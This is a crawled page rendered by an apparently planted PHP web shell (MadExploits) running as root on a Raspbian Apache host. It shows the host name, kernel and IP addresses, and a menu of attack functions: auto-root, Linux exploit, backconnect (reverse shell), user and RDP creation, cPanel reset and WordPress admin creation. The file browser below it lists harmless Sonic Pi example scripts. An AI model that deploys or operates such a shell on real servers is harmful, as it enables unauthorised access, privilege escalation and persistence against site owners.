Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
sonic-pi /
examples /
illusionist /
[ HOME SHELL ]
Name
Size
Permission
Action
ambient_experiment.rb
637
B
-rw-r--r--
chord_inversions.rb
245
B
-rw-r--r--
filtered_dnb.rb
267
B
-rw-r--r--
fm_noise.rb
299
B
-rw-r--r--
jungle.rb
480
B
-rw-r--r--
ocean.rb
413
B
-rw-r--r--
reich_phase.rb
317
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ocean.rb
# Coded by Sam Aaron with_fx :reverb, mix: 0.5 do live_loop :oceans do s = synth [:bnoise, :cnoise, :gnoise].choose, amp: rrand(0.5, 1.5), attack: rrand(0, 4), sustain: rrand(0, 2), release: rrand(1, 5), cutoff_slide: rrand(0, 5), cutoff: rrand(60, 100), pan: rrand(-1, 1), pan_slide: rrand(1, 5), amp: rrand(0.5, 1) control s, pan: rrand(-1, 1), cutoff: rrand(60, 110) sleep rrand(2, 4) end end
Close